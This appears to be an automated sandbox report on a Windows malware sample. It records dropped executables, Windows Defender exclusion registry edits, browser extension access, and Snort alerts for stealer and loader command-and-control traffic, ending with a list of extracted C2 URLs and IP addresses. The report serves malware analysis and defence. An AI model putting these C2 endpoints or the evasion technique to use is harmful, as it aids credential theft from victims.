Source:	Binary string: Signature does not matchThe module signature does not match with .pdb signature source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: \??\C:\Windows\Immovables.pdb source: tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: Immovables.pdb source: i1crvbOZAP.exe, 00000000.00000003.1798566425.0000029625FFE000.00000004.00000020.00020000.00000000.sdmp, cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000000.1837512672.00000000005B2000.00000002.00000001.01000000.00000007.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Documents\SimpleAdobe\Immovables.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdbGCTL source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: \??\C:\Windows\Immovables.pdb(prq source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Loader.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: C:\Windows\Immovables.pdbpdbles.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000ACE000.00000004.00000020.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Instrumental.pdb2 source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2139084003.0000000000D79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mC:\Users\user\Documents\SimpleAdobe\Instrumental.pdbdA source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2133747821.0000000000B3A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: EfiGuardDxe.pdb7 source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2166062465.0000000002B77000.00000040.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\xekuwaziga-duwegoku-xiwefoya\51\ke.pdb source: i1crvbOZAP.exe, 00000000.00000003.1702717873.00000296262CB000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1695276080.0000029626011000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1695585570.0000029625C7D000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1695585570.0000029625C84000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1701959181.0000029625EC1000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1698528144.0000029626043000.00000004.00000020.00020000.00000000.sdmp, KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000000.1839069836.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000000.1839093609.0000000000410000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: m4C:\Windows\Immovables.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2133356336.0000000000758000.00000004.00000010.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2140687253.0000000000988000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: Immovables.pdbH source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Documents\SimpleAdobe\Immovables.pdbyL source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: i1crvbOZAP.exe, i1crvbOZAP.exe, 00000000.00000002.1968244486.00007FF6495B3000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: Immovables.pdbB source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Downloading symbols for [%s] %ssrvsymsrvhttp://https://_bad_pdb_file.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: \??\C:\Windows\Immovables.pdb\ source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Immovables.pdbvables.pdbpdbles.pdbmmovables.pdb@0 source: tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2140687253.0000000000988000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\dijireluw jecifokig b.pdb source: i1crvbOZAP.exe, 00000000.00000003.1782449752.000002962610F000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1780561393.0000029625ED4000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1761238928.0000029625FFE000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1761238928.0000029626005000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: Drive not readyThis error indicates a .pdb file related failure. source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: m8C:\Windows\Instrumental.pdb source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2133747821.0000000000B3A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: Unable to locate the .pdb file in this location source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: \??\C:\Windows\exe\Instrumental.pdb source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2139084003.0000000000D40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\Immovables.pdbcu source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: The module signature does not match with .pdb signature. source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: .pdb.dbg source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: symbols\exe\Immovables.pdb source: tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2140687253.0000000000988000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: '(EfiGuardDxe.pdbx source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: Immovables.pdbvables.pdbpdbles.pdbmmovables.pdb@` source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2133356336.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: )).pdb source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2133747821.0000000000B3A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: or you do not have access permission to the .pdb location. source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: \??\C:\Windows\Immovables.pdbb5[ source: tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\Immovables.pdbizS source: tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2648652506.0000000065ADF000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: m.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2133356336.0000000000758000.00000004.00000010.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2140687253.0000000000988000.00000004.00000010.00020000.00000000.sdmp, fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2133747821.0000000000B3A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: g1nHVnlr2tXTEWQsRz_M547D.exe, 00000009.00000002.2305300505.00000000064C6000.00000004.00000800.00020000.00000000.sdmp, g1nHVnlr2tXTEWQsRz_M547D.exe, 00000009.00000002.2305300505.0000000006651000.00000004.00000800.00020000.00000000.sdmp

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{DC325940-6FBF-42F0-8A46-E7E120706631}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Exclusions_Extensions			Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{DC325940-6FBF-42F0-8A46-E7E120706631}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions exe			Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	12_2_00412570
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	12_2_0040D1C0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	12_2_004015C0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	12_2_00411650
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	12_2_0040B610
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	12_2_0040DB60
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	12_2_00411B80
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	12_2_0040D540
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	12_2_004121F0

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2049837 ET TROJAN Suspected PrivateLoader Activity (POST) 192.168.2.4:49731 -> 46.226.167.187:80
Source: Traffic	Snort IDS: 2049837 ET TROJAN Suspected PrivateLoader Activity (POST) 192.168.2.4:49802 -> 46.226.167.187:80
Source: Traffic	Snort IDS: 2049837 ET TROJAN Suspected PrivateLoader Activity (POST) 192.168.2.4:49803 -> 46.226.167.187:80
Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49807 -> 185.172.128.26:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49807 -> 185.172.128.26:80
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49807 -> 185.172.128.26:80
Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 5.42.65.117:50500 -> 192.168.2.4:49814
Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 193.233.132.67:50500 -> 192.168.2.4:49815
Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 5.42.65.117:50500 -> 192.168.2.4:49817
Source: Traffic	Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.4:49814 -> 5.42.65.117:50500
Source: Traffic	Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49819 -> 5.42.65.0:29587
Source: Traffic	Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49819 -> 5.42.65.0:29587
Source: Traffic	Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 5.42.65.0:29587 -> 192.168.2.4:49819
Source: Traffic	Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.4:49814 -> 5.42.65.117:50500
Source: Traffic	Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.4:49815 -> 193.233.132.67:50500
Source: Traffic	Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.4:49817 -> 5.42.65.117:50500
Source: Traffic	Snort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 5.42.65.0:29587 -> 192.168.2.4:49819
Source: Traffic	Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 193.233.132.67:50500 -> 192.168.2.4:49815
Source: Traffic	Snort IDS: 2046268 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) 192.168.2.4:49815 -> 193.233.132.67:50500
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49857 -> 193.233.132.56:80
Source: Traffic	Snort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 193.233.132.56:80 -> 192.168.2.4:49857
Source: Traffic	Snort IDS: 2044696 ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2 192.168.2.4:49857 -> 193.233.132.56:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49862 -> 37.255.238.137:80
Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 193.233.132.74:58709 -> 192.168.2.4:49863
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49864 -> 37.255.238.137:80
Source: Traffic	Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 193.233.132.74:58709 -> 192.168.2.4:49863
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49866 -> 37.255.238.137:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49870 -> 37.255.238.137:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49871 -> 37.255.238.137:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49872 -> 37.255.238.137:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49874 -> 37.255.238.137:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49875 -> 37.255.238.137:80
Source: Traffic	Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.4:49863 -> 193.233.132.74:58709
Source: Traffic	Snort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.4:49876 -> 193.233.132.56:80
Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 193.233.132.74:58709 -> 192.168.2.4:49881
Source: Traffic	Snort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.4:49882 -> 193.233.132.56:80
Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 193.233.132.74:58709 -> 192.168.2.4:49891

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 37.255.238.137 80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 185.172.128.26/f993692117a3fda2.php
Source: Malware configuration extractor	URLs: http://nidoe.org/tmp/index.php
Source: Malware configuration extractor	URLs: http://sodez.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://uama.com.ua/tmp/index.php
Source: Malware configuration extractor	URLs: http://talesofpirates.net/tmp/index.php
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199658817715
